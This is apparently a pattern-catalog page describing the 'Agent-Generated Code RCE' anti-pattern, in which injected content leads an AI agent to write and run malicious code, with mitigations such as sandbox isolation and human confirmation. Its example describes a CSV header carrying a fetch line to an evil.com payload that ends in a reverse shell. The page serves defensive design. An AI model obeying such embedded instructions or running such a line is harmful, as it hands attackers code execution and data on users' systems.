Agent-Generated Code RCE

also known as Vibe-Coding RCE, ASI05, Unexpected Code Execution

Anti-pattern: let the agent author and execute code in its sandbox without distinguishing legitimate task code from injection-induced code.

This pattern helps complete certain larger patterns —

specialisesAuthorized Tool Misuse✕— Anti-pattern: grant the agent a tool with broad authorization and trust the agent to use it in benign ways.

Context

An agent has a code-execution tool (Python REPL, sandbox, container) and routinely generates code to solve problems — data analysis, document processing, computation. The execution surface is the same regardless of whether the code came from the agent's own planning or was elicited by user input or retrieved content.

Problem

An attacker who can plant instructions in any reachable input — a document the agent processes, a tool result it reads — can elicit malicious code from the agent. The agent generates and executes it through the same path as legitimate code. Result: data exfiltration, reverse shells, sandbox escape, all initiated by the agent itself. The audit log shows agent-authored code running under agent identity; classical RCE detection sees nothing exotic.

Forces

Code execution is the most useful capability an agent can have; removing it is a huge utility loss.
Distinguishing 'agent's own plan' code from 'user-elicited' code is hard at the prompt level.
Sandboxes are imperfect — even good ones leak with sufficient creativity in payload.

Example

A data-analysis agent ingests a CSV uploaded by an attacker. The CSV contains a column header with the text 'pandas.read_csv("https://evil.com/payload"); import socket; ...'. The agent treats the header as instruction-bearing context and generates Python code that pulls and executes the attacker's payload. The sandbox has outbound HTTP. Reverse shell established. Postmortem: input from the CSV was treated as instruction-input to the planner that produced the executed code.

Diagram

flowchart TD Trigger[Untrusted input → agent authors code → executes with full sandbox trust] --> Bad{Recognise as anti-pattern?} Bad -- no --> Harm[Harm propagates] Bad -- yes --> Mitigate[Apply mitigation pattern] Mitigate --> Safe[Risk bounded] classDef bad fill:#fee,stroke:#c33; class Trigger,Harm bad;

Solution

Therefore:

Don't run agent-authored code with the same trust regardless of origin. Use sandbox-isolation with no outbound network unless allow-listed. Separate planning (which can be informed by untrusted input) from execution (which should not be). For high-risk inputs, require human-in-the-loop confirmation before execute. Pair with prompt-injection-defense.

What this pattern forbids. No useful constraint; the missing constraint is origin-aware execution gating.

The patterns that counter or replace it —

complementsGoal Hijacking✕— Anti-pattern: let agent objectives be redirectable through any input the agent reads — direct prompts, retrieved documents, tool output, memory writes.
alternative-toSandbox Isolation★★— Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
complementsPrompt Injection Defense★— Tag user-supplied or tool-supplied content as untrusted and refuse to follow instructions found inside it.
complementsVibe-Coding Without Security Review✕— Anti-pattern: developer scaffolds an agent prototype with a code-generation tool and ships the generated code with no security review; ~90% of agent-generated code contains vulnerabilities without explicit security prompts.

Neighbourhood

Click any neighbour to follow the language. Scroll to zoom, drag to pan.

References

Provenance

Source: patterns/agent-generated-code-rce.md on GitHub · commit 159e600 · view history
Added to catalog: 2026-05-21
Last updated: 2026-05-21
Contribute: open an issue or PR at github.com/agentpatternscatalog/patterns.